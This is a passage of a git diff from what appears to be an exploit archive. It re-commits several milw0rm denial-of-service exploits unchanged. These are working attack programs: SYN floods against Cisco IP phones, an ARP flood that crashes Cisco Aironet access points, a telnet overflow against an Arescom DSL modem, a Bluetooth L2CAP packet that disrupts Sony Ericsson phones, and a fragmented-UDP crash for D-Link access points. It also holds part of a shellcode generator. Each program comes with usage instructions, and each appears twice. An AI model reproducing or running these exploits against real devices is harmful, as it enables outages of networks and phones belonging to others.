{ + va_list ap; + char buf[256], pad_buf[4], *w_buf; + int pad_length, buf_length, i, tot_length; + + memset(buf, 0x0, sizeof(buf)); + + va_start(ap, fmt); + vsnprintf(buf, sizeof(buf), fmt, ap); + va_end(ap); + + buf_length = strlen(buf); + + printf("\nURL: %s\n", buf); + printf("Header Length: %d bytes\n", buf_length); + + for (i = 1; buf_length > (i * 4); i++) { + pad_length = ((i+1)*4) - buf_length; + } + + printf("Padding Length: %d bytes\n\n", pad_length); + + tot_length = buf_length + pad_length; + + w_buf = buf; + + if (pad_length) { + + w_buf = calloc(tot_length, sizeof(char)); + + if (!w_buf) { + + perror("calloc"); + return -1; + } + + i = index(buf, '/') - buf; + + memset(pad_buf, 0x2f, sizeof(pad_buf)); + + memcpy(w_buf, buf, i); + memcpy(w_buf+i, pad_buf, pad_length); + memcpy(w_buf+pad_length+i, buf+i, buf_length - i); + } + + for (i = tot_length - 1; i > -1; i-=4) { + + printf("\t\"\\x%02x\\x%02x\\x%02x\\x%02x\\x%02x\" // pushl $0x%02x%02x%02x%02x\n", + X86_PUSH, w_buf[i-3], w_buf[i-2], w_buf[i-1], w_buf[i], w_buf[i-3], w_buf[i-2], w_buf[i-1], w_buf[i]); + } + + if (pad_length) { + + free(w_buf); + } + + // + // The EDX register is assumed to be zero-out within the shellcode. + // + + if (tot_length < 256) { + + // 8bit value + + X86_MOV_TO_DL(tot_length); + + } else if (tot_length < 655356) { + + // 16bit value + + X86_MOV_TO_DX(tot_length); + + } else { + + // 32bit value, rarely but possible ;-) + + X86_MOV_TO_EDX(tot_length); + + } + + fputc('\n', stdout); + + return 1; +} + // milw0rm.com [2006-10-22] \ No newline at end of file diff --git a/platforms/hardware/dos/1153.pl b/platforms/hardware/dos/1153.pl index e8108f2c2..9aa0f52fb 100755 --- a/platforms/hardware/dos/1153.pl +++ b/platforms/hardware/dos/1153.pl 
@@ -55,6 +55,6 @@ close $sox;
 print color 'bold blue';
 print "ping the remote device $victim again\n";
 print color 'reset';
-system("ping -c 3 $victim");
-
-# milw0rm.com [2005-08-12]
+system("ping -c 3 $victim");
+
+# milw0rm.com [2005-08-12]
diff --git a/platforms/hardware/dos/1338.pl b/platforms/hardware/dos/1338.pl
index 52465a27d..2bafc83af 100755
--- a/platforms/hardware/dos/1338.pl
+++ b/platforms/hardware/dos/1338.pl
@@ -1,107 +1,107 @@ -# The easy way by logic logidev@gmail.com (line 2) untested /str0ke -# hping -c 1 -S -s 31337 -k -b -p 22 10.0.xx.xxx - -#!/usr/bin/perl -eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed \n" if $@; -eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not installed \n" if $@; -eval ("use Term::ProgressBar;"); -die "[error] Term::ProgressBar perl module is not installed \n" if $@; -my $VERSION = "0.1"; -print "$0, $PgmName, V $VERSION \n"; -GetOptions ( -"help" =>\$usage, -"device=s" => \$device, -"source=s" =>\$sourceip, -"dest=s"=>\$destip, -"sourcemac=s"=>\$sourcemac, -"destmac=s"=>\$destmac, -"port=n"=> \$tcpport, -); - -######################## Config option #################### - -my $timeout = "0,1"; # Timeout - -if ($usage) {&usage;} - -if (!$device) { -$device= 'eth0'; # Network device -} - -if (!$destmac) {print "Dest MAC not found \n"; &usage;} -if (!$sourceip) {print "Source IP not found \n"; &usage;} -if (!$destip) {print "Dest IP not found \n"; &usage;} -if (!$tcpport) {print "TCP port not found \n"; &usage;} - -my $syn="1"; # TCP SYN SET -my $tcpdata = "TEST"; # TCP payload -my $count=0; - -###################################################### - -#Initialize Progres Bar -my $progress = Term::ProgressBar->new(32768); -$progress->minor(0); -$packet = new Net::RawIP; -$packet-> ethnew($device); - - -if (!$sourcemac) { -$packet -> ethset( dest => $destmac); -}else { -$packet -> ethset( source =>$sourcemac, dest => $destmac); -} - - - -for ($count=0; $count< 65537 ; $count++) { - -$packet->set({ - -ip => { -saddr => $sourceip, -daddr => $destip -}, - -tcp => { -check => 0x0010 , # TCP Packet Checksum 0 for auto correct -source => $count, -dest => $tcpport, -syn => $syn, -data => $tcpdata -}}); -$packet->ethsend($timeout); -#$packet->send($timeout); - -$progress->update($_); -$count++; -} - -sub usage { -print <\$usage, +"device=s" => \$device, +"source=s" =>\$sourceip, +"dest=s"=>\$destip, 
+"sourcemac=s"=>\$sourcemac, +"destmac=s"=>\$destmac, +"port=n"=> \$tcpport, +); + +######################## Config option #################### + +my $timeout = "0,1"; # Timeout + +if ($usage) {&usage;} + +if (!$device) { +$device= 'eth0'; # Network device +} + +if (!$destmac) {print "Dest MAC not found \n"; &usage;} +if (!$sourceip) {print "Source IP not found \n"; &usage;} +if (!$destip) {print "Dest IP not found \n"; &usage;} +if (!$tcpport) {print "TCP port not found \n"; &usage;} + +my $syn="1"; # TCP SYN SET +my $tcpdata = "TEST"; # TCP payload +my $count=0; + +###################################################### + +#Initialize Progres Bar +my $progress = Term::ProgressBar->new(32768); +$progress->minor(0); +$packet = new Net::RawIP; +$packet-> ethnew($device); + + +if (!$sourcemac) { +$packet -> ethset( dest => $destmac); +}else { +$packet -> ethset( source =>$sourcemac, dest => $destmac); +} + + + +for ($count=0; $count< 65537 ; $count++) { + +$packet->set({ + +ip => { +saddr => $sourceip, +daddr => $destip +}, + +tcp => { +check => 0x0010 , # TCP Packet Checksum 0 for auto correct +source => $count, +dest => $tcpport, +syn => $syn, +data => $tcpdata +}}); +$packet->ethsend($timeout); +#$packet->send($timeout); + +$progress->update($_); +$count++; +} + +sub usage { +print < " unless ($ARGV[4]); -$pkt->set({ - ip => { - saddr => $ARGV[0], - daddr => $ARGV[1] - }, - tcp=> { dest => $ARGV[2], - syn => 1, - seq => 0, - ack => 0} - }); -for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; }; - -# milw0rm.com [2006-01-10] +#!/usr/bin/perl +# This is made for trashing cisco 7940 ip phones. kokanin made/discovered this. +# A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my +# phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!! +# not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny +# protocol - this is not for the SIP firmware. 
+
+use Net::RawIP;
+use Time::HiRes;
+$pkt = new Net::RawIP;
+die "Usage $0 " unless ($ARGV[4]);
+$pkt->set({
+ ip => {
+ saddr => $ARGV[0],
+ daddr => $ARGV[1]
+ },
+ tcp=> { dest => $ARGV[2],
+ syn => 1,
+ seq => 0,
+ ack => 0}
+ });
+for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; };
+
+# milw0rm.com [2006-01-10]
diff --git a/platforms/hardware/dos/1447.c b/platforms/hardware/dos/1447.c
index e8771e5f3..5e329c988 100755
--- a/platforms/hardware/dos/1447.c
+++ b/platforms/hardware/dos/1447.c
@@ -1,109 +1,109 @@ -// -// Cisco Killer - ciskill.c -// -// Usage: ./ciskill [device] -// -// Author: Pasv (pasvninja [at] gmail.com) -// -// Credit: This exploit takes advantage of a vulnerability that was -// discovered by Eric Smith on January 12, 2006 (bid:16217) -// -// Greets to NW, zimmy, GSO, and the rest. -// -// Description: The vulnerability exists in the way the affected versions -// below handle ARP replies, if enough specially crafted ARP packets are sent -// on the network with the affected systems it will cause the access point memory -// exhaustion which will in a few seconds (depending on the speed of the attacker -// and the memory of the target) crash the system, making all ingoing/outgoing -// traffic stopped. -// -// Disclaimer: I pity the foo who uses this exploit for evil, I take no responsibility -// for your actions (like a knife maker). -// -// Versions affected: -// Cisco Aironet 350 IOS -// Cisco Aironet 1400 -// Cisco Aironet 1300 -// Cisco Aironet 1240AG -// Cisco Aironet 1230AG -// Cisco Aironet 1200 -// Cisco Aironet 1130AG -// Cisco Aironet 1100 -// (this includes most linksys wireless access points) - - - -#include -#include -#include -#include -#include -#include -#include - -// Edit this packet accordingly if the target is picky -char pkt[]= -// Ethernet header -"\xff\xff\xff\xff\xff\xff" // Destination: broadcast -"AAAAAA" // Source: 41:41:41:41:41:41 -"\x08\x06" // Pkt type: ARP -// ARP header -"\x00\x01" // Hardware type: Ethernet -"\x08\x00" // Protocol: IP -"\x06" // Hardware size: 6 -"\x04" // Protocol size: 4 -"\x00\x02" // Opcode: Reply -"AAAAAA" // Sender (Mac): 41:41:41:41:41:41 -"AAAA" // Sender (IP): 65.65.65.65 -"AAAAAA" // Target (mac): 41:41:41:41:41:41 -"AAAA" // Target (IP): 65.65.65.65 -; // End of Packet - -int main(int argc, char **argv) { - FILE *fp; - int sock, seed; - long count; - char *device; - in_addr_t addr; - struct sockaddr sin; - - printf("CisKill -- Aironet Cisco Killer\nCoded by: Pasv\nDiscovery 
credit: Eric Smith\n"); - if(getuid()) { - printf("Must be root to inject arp packets!\n"); - exit(1); - } - - if(argc != 2) { - strcpy(device,"wlan0"); - } - else { - device=argv[1]; - } - - fp = fopen("/dev/urandom", "r"); - fscanf(fp,"%d", &seed); - fclose(fp); - srand(seed); - - memset(&sin, 0, sizeof(sin)); - sin.sa_family = AF_UNSPEC; - strncpy(sin.sa_data,device, 14); - - sock = socket(PF_INET, SOCK_PACKET, 0x300); - - printf("Using device: %s\n\n", device); - - // stupid - printf("Press ctrl+c immediately if you wish to stop\nGoing in 5\n"); - sleep(1);printf(" 4\n");sleep(1);printf(" 3\n");sleep(1);printf(" 2\n");sleep(1);printf(" 1!\n");sleep(1); - - while(1) { - addr = (rand()%0xff)+(rand()%0xff)+(rand()%0xff)+(rand()%0xff); - pkt[28] = (char)addr; - pkt[38] = (char)addr; - count++; - printf("#:%ld bytes sent: %d (should be 42)\n",count, sendto(sock, pkt, 42, 0, (struct sockaddr *)&sin, sizeof(sin))); - } -} - -// milw0rm.com [2006-01-25] +// +// Cisco Killer - ciskill.c +// +// Usage: ./ciskill [device] +// +// Author: Pasv (pasvninja [at] gmail.com) +// +// Credit: This exploit takes advantage of a vulnerability that was +// discovered by Eric Smith on January 12, 2006 (bid:16217) +// +// Greets to NW, zimmy, GSO, and the rest. +// +// Description: The vulnerability exists in the way the affected versions +// below handle ARP replies, if enough specially crafted ARP packets are sent +// on the network with the affected systems it will cause the access point memory +// exhaustion which will in a few seconds (depending on the speed of the attacker +// and the memory of the target) crash the system, making all ingoing/outgoing +// traffic stopped. +// +// Disclaimer: I pity the foo who uses this exploit for evil, I take no responsibility +// for your actions (like a knife maker). 
+// +// Versions affected: +// Cisco Aironet 350 IOS +// Cisco Aironet 1400 +// Cisco Aironet 1300 +// Cisco Aironet 1240AG +// Cisco Aironet 1230AG +// Cisco Aironet 1200 +// Cisco Aironet 1130AG +// Cisco Aironet 1100 +// (this includes most linksys wireless access points) + + + +#include +#include +#include +#include +#include +#include +#include + +// Edit this packet accordingly if the target is picky +char pkt[]= +// Ethernet header +"\xff\xff\xff\xff\xff\xff" // Destination: broadcast +"AAAAAA" // Source: 41:41:41:41:41:41 +"\x08\x06" // Pkt type: ARP +// ARP header +"\x00\x01" // Hardware type: Ethernet +"\x08\x00" // Protocol: IP +"\x06" // Hardware size: 6 +"\x04" // Protocol size: 4 +"\x00\x02" // Opcode: Reply +"AAAAAA" // Sender (Mac): 41:41:41:41:41:41 +"AAAA" // Sender (IP): 65.65.65.65 +"AAAAAA" // Target (mac): 41:41:41:41:41:41 +"AAAA" // Target (IP): 65.65.65.65 +; // End of Packet + +int main(int argc, char **argv) { + FILE *fp; + int sock, seed; + long count; + char *device; + in_addr_t addr; + struct sockaddr sin; + + printf("CisKill -- Aironet Cisco Killer\nCoded by: Pasv\nDiscovery credit: Eric Smith\n"); + if(getuid()) { + printf("Must be root to inject arp packets!\n"); + exit(1); + } + + if(argc != 2) { + strcpy(device,"wlan0"); + } + else { + device=argv[1]; + } + + fp = fopen("/dev/urandom", "r"); + fscanf(fp,"%d", &seed); + fclose(fp); + srand(seed); + + memset(&sin, 0, sizeof(sin)); + sin.sa_family = AF_UNSPEC; + strncpy(sin.sa_data,device, 14); + + sock = socket(PF_INET, SOCK_PACKET, 0x300); + + printf("Using device: %s\n\n", device); + + // stupid + printf("Press ctrl+c immediately if you wish to stop\nGoing in 5\n"); + sleep(1);printf(" 4\n");sleep(1);printf(" 3\n");sleep(1);printf(" 2\n");sleep(1);printf(" 1!\n");sleep(1); + + while(1) { + addr = (rand()%0xff)+(rand()%0xff)+(rand()%0xff)+(rand()%0xff); + pkt[28] = (char)addr; + pkt[38] = (char)addr; + count++; + printf("#:%ld bytes sent: %d (should be 42)\n",count, sendto(sock, 
pkt, 42, 0, (struct sockaddr *)&sin, sizeof(sin)));
+ }
+}
+
+// milw0rm.com [2006-01-25]
diff --git a/platforms/hardware/dos/1464.c b/platforms/hardware/dos/1464.c
index 7d19c4b04..cf798a56e 100755
--- a/platforms/hardware/dos/1464.c
+++ b/platforms/hardware/dos/1464.c
@@ -1,103 +1,103 @@ -/* - Do you want to hack? les`t go .. free your mind - Tu veux etre un hacker? allez .. if faut libere ta tete! - Quieres hackear? dale .. libera tu mente - - Vulnerabilidad en modem Arescom NetDSL-1000 - por un buffer overflow debido < [255] en la pila stack. - - DoS atack por Fabian Ramirez S. - www.framirez.com - - - If you flood the telnet configuration a couple dozen times with long - strings, eventually the telnetd service flat out dies. Routing functions - of the NetDSL continue to work fine as before. It is unknown whether only - the telnetd service is affected, other means of remote configuration may - have become unavailable as well. - - Remember: KING - - Solo para fines educativos! (CREEEEEEO ZEEEEEEEEEEE) -*/ - -#include -#include -#include -#include -#include -#include - -#define PORT 23 -#define MAXDATASIZE 100 - -char shellcode[]= "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1"; - -int main(int argc, char *argv[]) -{ - int fd, numbytes,i; - char buf[MAXDATASIZE]; - struct hostent *he; - struct sockaddr_in server; - - printf("Exploit Arescom NetDSL-1000 executing\n"); - printf (" by framirez\n"); - - if (argc !=2) { - printf("Uso: %s \n",argv[0]); - exit(-1); - } - - - - if 
((he=gethostbyname(argv[1]))==NULL){ - printf("gethostbyname() error\n"); - exit(-1); - } - - if ((fd=socket(AF_INET, SOCK_STREAM, 0))==-1){ - printf("socket() error\n"); - exit(-1); - } - - server.sin_family = AF_INET; - server.sin_port = htons(PORT); - server.sin_addr = *((struct in_addr *)he->h_addr); - - if(connect(fd, (struct sockaddr *)&server, - sizeof(struct sockaddr))==-1){ - printf("ERROR conectando al host\n"); - exit(-1); - } - - for (i=0;i<3;i++) - { - send(fd,shellcode,255,0); - } - - printf ("Exploit enviado con EXITO al destinatario\n"); - printf (" by framirez\n"); - - close(fd); - - return 1; -} - -// milw0rm.com [2006-02-02] +/* + Do you want to hack? les`t go .. free your mind + Tu veux etre un hacker? allez .. if faut libere ta tete! + Quieres hackear? dale .. libera tu mente + + Vulnerabilidad en modem Arescom NetDSL-1000 + por un buffer overflow debido < [255] en la pila stack. + + DoS atack por Fabian Ramirez S. + www.framirez.com + + + If you flood the telnet configuration a couple dozen times with long + strings, eventually the telnetd service flat out dies. Routing functions + of the NetDSL continue to work fine as before. It is unknown whether only + the telnetd service is affected, other means of remote configuration may + have become unavailable as well. + + Remember: KING + + Solo para fines educativos! 
(CREEEEEEO ZEEEEEEEEEEE) +*/ + +#include +#include +#include +#include +#include +#include + +#define PORT 23 +#define MAXDATASIZE 100 + +char shellcode[]= "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1"; + +int main(int argc, char *argv[]) +{ + int fd, numbytes,i; + char buf[MAXDATASIZE]; + struct hostent *he; + struct sockaddr_in server; + + printf("Exploit Arescom NetDSL-1000 executing\n"); + printf (" by framirez\n"); + + if (argc !=2) { + printf("Uso: %s \n",argv[0]); + exit(-1); + } + + + + if ((he=gethostbyname(argv[1]))==NULL){ + printf("gethostbyname() error\n"); + exit(-1); + } + + if ((fd=socket(AF_INET, SOCK_STREAM, 0))==-1){ + printf("socket() error\n"); + exit(-1); + } + + server.sin_family = AF_INET; + server.sin_port = htons(PORT); + server.sin_addr = *((struct in_addr *)he->h_addr); + + if(connect(fd, (struct sockaddr *)&server, + sizeof(struct sockaddr))==-1){ + printf("ERROR conectando al host\n"); + exit(-1); + } + + for (i=0;i<3;i++) + { + send(fd,shellcode,255,0); + } + + printf ("Exploit enviado con EXITO al destinatario\n"); + printf (" by framirez\n"); + + close(fd); + + return 1; +} + +// milw0rm.com [2006-02-02] 
diff --git a/platforms/hardware/dos/1473.c b/platforms/hardware/dos/1473.c
index 02d202ee1..3b2da98b0 100755
--- a/platforms/hardware/dos/1473.c
+++ b/platforms/hardware/dos/1473.c
@@ -1,101 +1,101 @@ -/* Sony/Ericsson reset display - PoC */ -/* Pierre BETOUIN - pierre.betouin@infratech.fr */ -/* 05-02-2006 */ -/* Vulnerability found using BSS fuzzer : */ -/* Download www.secuobs.com/news/05022006-bluetooth10.shml */ -/* */ -/* Causes anormal behaviours on some Sony/Ericsson */ -/* cell phones */ -/* Vulnerable tested devices : */ -/* - K600i */ -/* - V600i */ -/* - K750i */ -/* - W800i */ -/* - And maybe other ones... */ -/* */ -/* Vulnerable devices will slowly turn their screen into */ -/* black and then display a white screen. */ -/* After a short period (~45sec), they will go back to */ -/* their normal behaviour */ -/* */ -/* gcc -lbluetooth reset_display_sonyericsson.c */ -/* -o reset_display_sonyericsson */ -/* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX */ - -#include -#include -#include -#include -#include -#include -#include -#include - -#define SIZE 4 -#define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header) - -int main(int argc, char **argv) -{ -char *buffer; -l2cap_cmd_hdr *cmd; -struct sockaddr_l2 addr; -int sock, sent, i; - -if(argc < 2) -{ -fprintf(stderr, "%s \n", argv[0]); -exit(EXIT_FAILURE); -} - -if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) -{ -perror("socket"); -exit(EXIT_FAILURE); -} - -memset(&addr, 0, sizeof(addr)); -addr.l2_family = AF_BLUETOOTH; - -if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) -{ -perror("bind"); -exit(EXIT_FAILURE); -} - -str2ba(argv[1], &addr.l2_bdaddr); - -if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) -{ -perror("connect"); -exit(EXIT_FAILURE); -} - -if(!(buffer = (char *) malloc ((int) SIZE + 1))) -{ -perror("malloc"); -exit(EXIT_FAILURE); -} - -memset(buffer, 90, SIZE); - -cmd = (l2cap_cmd_hdr *) buffer; -cmd->code = L2CAP_ECHO_REQ; -cmd->ident = 1; -cmd->len = FAKE_SIZE; - -if( (sent=send(sock, buffer, SIZE, 0)) >= 0) -{ -printf("L2CAP packet sent (%d)\n", sent); -} - -printf("Buffer:\t"); -for(i=0; i +#include +#include +#include 
+#include +#include +#include +#include + +#define SIZE 4 +#define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header) + +int main(int argc, char **argv) +{ +char *buffer; +l2cap_cmd_hdr *cmd; +struct sockaddr_l2 addr; +int sock, sent, i; + +if(argc < 2) +{ +fprintf(stderr, "%s \n", argv[0]); +exit(EXIT_FAILURE); +} + +if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) +{ +perror("socket"); +exit(EXIT_FAILURE); +} + +memset(&addr, 0, sizeof(addr)); +addr.l2_family = AF_BLUETOOTH; + +if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) +{ +perror("bind"); +exit(EXIT_FAILURE); +} + +str2ba(argv[1], &addr.l2_bdaddr); + +if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) +{ +perror("connect"); +exit(EXIT_FAILURE); +} + +if(!(buffer = (char *) malloc ((int) SIZE + 1))) +{ +perror("malloc"); +exit(EXIT_FAILURE); +} + +memset(buffer, 90, SIZE); + +cmd = (l2cap_cmd_hdr *) buffer; +cmd->code = L2CAP_ECHO_REQ; +cmd->ident = 1; +cmd->len = FAKE_SIZE; + +if( (sent=send(sock, buffer, SIZE, 0)) >= 0) +{ +printf("L2CAP packet sent (%d)\n", sent); +} + +printf("Buffer:\t"); +for(i=0; i - -#define DEVICE "eth0" -#define SRC_IP "127.0.0.1" -#define DST_IP "127.0.0.1" -#define SRC_PRT 200 -#define DST_PRT 11111 - -void usage (char *name) -{ - fprintf (stderr, - "Usage: %s -s -d \ - -a -b \n", - name); - - exit (EXIT_FAILURE); -} - -int gen_packet (char *device, char *pSRC, char *pDST, u_short sPRT, - u_short dPRT, int count) -{ - - libnet_t *l = NULL; - libnet_ptag_t udp = 0; - libnet_ptag_t ip = 0; - - char errbuf[LIBNET_ERRBUF_SIZE]; - char *payload = NULL; - u_short payload_s = 0, src_prt, dst_prt; - u_long src_ip, dst_ip; - int c, frag; - - if (!device) - device = DEVICE; - - l = libnet_init (LIBNET_RAW4, device, errbuf); - - if (!l) { - fprintf (stderr, "libnet_init() failed: %s\n", errbuf); - exit (EXIT_FAILURE); - } - - src_ip = pSRC ? 
libnet_name2addr4 (l, pSRC, LIBNET_RESOLVE) : - libnet_name2addr4 (l, SRC_IP, LIBNET_RESOLVE); - - dst_ip = pDST ? libnet_name2addr4 (l, pDST, LIBNET_RESOLVE) : - libnet_name2addr4 (l, DST_IP, LIBNET_RESOLVE); - - src_prt = sPRT ? sPRT : SRC_PRT; - - dst_prt = dPRT ? dPRT : DST_PRT; - - if (count == 1) { - payload = "\0\0\0\0\0\0\0\0"; - payload_s = 8; - } - - udp = libnet_build_udp (src_prt, - dst_prt, - (LIBNET_UDP_H + payload_s) * 2, - 0, (unsigned char *)payload, payload_s, l, udp); - - if (udp == -1) { - fprintf (stderr, "Can't build UDP header: %s\n", libnet_geterror (l)); - exit (EXIT_FAILURE); - } - - switch (count) { - - case 1: - frag = IP_MF; - break; - - case 2: - frag = 0x2002; - break; - - case 3: - frag = 0x0003; - break; - } - - ip = libnet_build_ipv4 (20, - 0, - 1800, - frag, - 128, - IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l, ip); - - if (ip == -1) { - fprintf (stderr, "Can't build IP header: %s\n", libnet_geterror (l)); - exit (EXIT_FAILURE); - } - - c = libnet_write (l); - - if (c == -1) { - fprintf (stderr, "Write error: %s\n", libnet_geterror (l)); - exit (EXIT_FAILURE); - } - - printf ("Wrote UDP packet; check the wire.\n"); - - libnet_destroy (l); - - return (EXIT_SUCCESS); - -} - -int main (int argc, char **argv) -{ - - int i; - char *pDST, *pSRC, *device; - u_short dPRT = 0; - u_short sPRT = 0; - - pDST = pSRC = device = NULL; - - while ((i = getopt (argc, argv, "D:d:s:a:b:h")) != EOF) { - switch (i) { - case 'D': - device = optarg; - break; - case 'd': - pDST = optarg; - break; - case 's': - pSRC = optarg; - break; - case 'a': - sPRT = atoi (optarg); - break; - case 'b': - dPRT = atoi (optarg); - break; - case 'h': - usage (argv[0]); - break; - } - } - - printf ("\n----------------------------------\n"); - printf (" -= D-Link DoS PoC =-\n"); - printf (" Aaron Portnoy\n"); - printf (" deft () thunkers ! net \n"); - printf (" silc.thunkers.net, thunkers\n"); - printf ("----------------------------------\n"); - - - device ? 
printf ("\nDevice: \t%s\n", device) : - printf ("\nDevice: \t%s\n", DEVICE); - - pSRC ? printf ("SRC IP: \t%s\n", pSRC) : - printf ("SRC IP: \t%s\n", SRC_IP); - - pDST ? printf ("DST IP: \t%s\n", pDST) : - printf ("DST IP: \t%s\n", DST_IP); - - sPRT ? printf ("SPort: \t\t%d\n", sPRT) : - printf ("SPort: \t\t%d\n", SRC_PRT); - - dPRT ? printf ("DPort: \t\t%d\n\n", dPRT) : - printf ("DPort: \t\t%d\n\n", DST_PRT); - - for (i = 1; i <= 3; i++) - gen_packet (device, pSRC, pDST, sPRT, dPRT, i); - printf ("\n"); - - return (EXIT_SUCCESS); -} - -// milw0rm.com [2006-02-14] +/* + * + * Aaron Portnoy + * + * silc.thunkers.net, thunkers + * + * D-Link Wireless Access Point + * Fragmented UDP DoS Proof of Concept + * + * + * gcc -o dlink_dos dlink_dos.c -lnet -Wall + * + */ + +#include + +#define DEVICE "eth0" +#define SRC_IP "127.0.0.1" +#define DST_IP "127.0.0.1" +#define SRC_PRT 200 +#define DST_PRT 11111 + +void usage (char *name) +{ + fprintf (stderr, + "Usage: %s -s -d \ + -a -b \n", + name); + + exit (EXIT_FAILURE); +} + +int gen_packet (char *device, char *pSRC, char *pDST, u_short sPRT, + u_short dPRT, int count) +{ + + libnet_t *l = NULL; + libnet_ptag_t udp = 0; + libnet_ptag_t ip = 0; + + char errbuf[LIBNET_ERRBUF_SIZE]; + char *payload = NULL; + u_short payload_s = 0, src_prt, dst_prt; + u_long src_ip, dst_ip; + int c, frag; + + if (!device) + device = DEVICE; + + l = libnet_init (LIBNET_RAW4, device, errbuf); + + if (!l) { + fprintf (stderr, "libnet_init() failed: %s\n", errbuf); + exit (EXIT_FAILURE); + } + + src_ip = pSRC ? libnet_name2addr4 (l, pSRC, LIBNET_RESOLVE) : + libnet_name2addr4 (l, SRC_IP, LIBNET_RESOLVE); + + dst_ip = pDST ? libnet_name2addr4 (l, pDST, LIBNET_RESOLVE) : + libnet_name2addr4 (l, DST_IP, LIBNET_RESOLVE); + + src_prt = sPRT ? sPRT : SRC_PRT; + + dst_prt = dPRT ? 
dPRT : DST_PRT; + + if (count == 1) { + payload = "\0\0\0\0\0\0\0\0"; + payload_s = 8; + } + + udp = libnet_build_udp (src_prt, + dst_prt, + (LIBNET_UDP_H + payload_s) * 2, + 0, (unsigned char *)payload, payload_s, l, udp); + + if (udp == -1) { + fprintf (stderr, "Can't build UDP header: %s\n", libnet_geterror (l)); + exit (EXIT_FAILURE); + } + + switch (count) { + + case 1: + frag = IP_MF; + break; + + case 2: + frag = 0x2002; + break; + + case 3: + frag = 0x0003; + break; + } + + ip = libnet_build_ipv4 (20, + 0, + 1800, + frag, + 128, + IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l, ip); + + if (ip == -1) { + fprintf (stderr, "Can't build IP header: %s\n", libnet_geterror (l)); + exit (EXIT_FAILURE); + } + + c = libnet_write (l); + + if (c == -1) { + fprintf (stderr, "Write error: %s\n", libnet_geterror (l)); + exit (EXIT_FAILURE); + } + + printf ("Wrote UDP packet; check the wire.\n"); + + libnet_destroy (l); + + return (EXIT_SUCCESS); + +} + +int main (int argc, char **argv) +{ + + int i; + char *pDST, *pSRC, *device; + u_short dPRT = 0; + u_short sPRT = 0; + + pDST = pSRC = device = NULL; + + while ((i = getopt (argc, argv, "D:d:s:a:b:h")) != EOF) { + switch (i) { + case 'D': + device = optarg; + break; + case 'd': + pDST = optarg; + break; + case 's': + pSRC = optarg; + break; + case 'a': + sPRT = atoi (optarg); + break; + case 'b': + dPRT = atoi (optarg); + break; + case 'h': + usage (argv[0]); + break; + } + } + + printf ("\n----------------------------------\n"); + printf (" -= D-Link 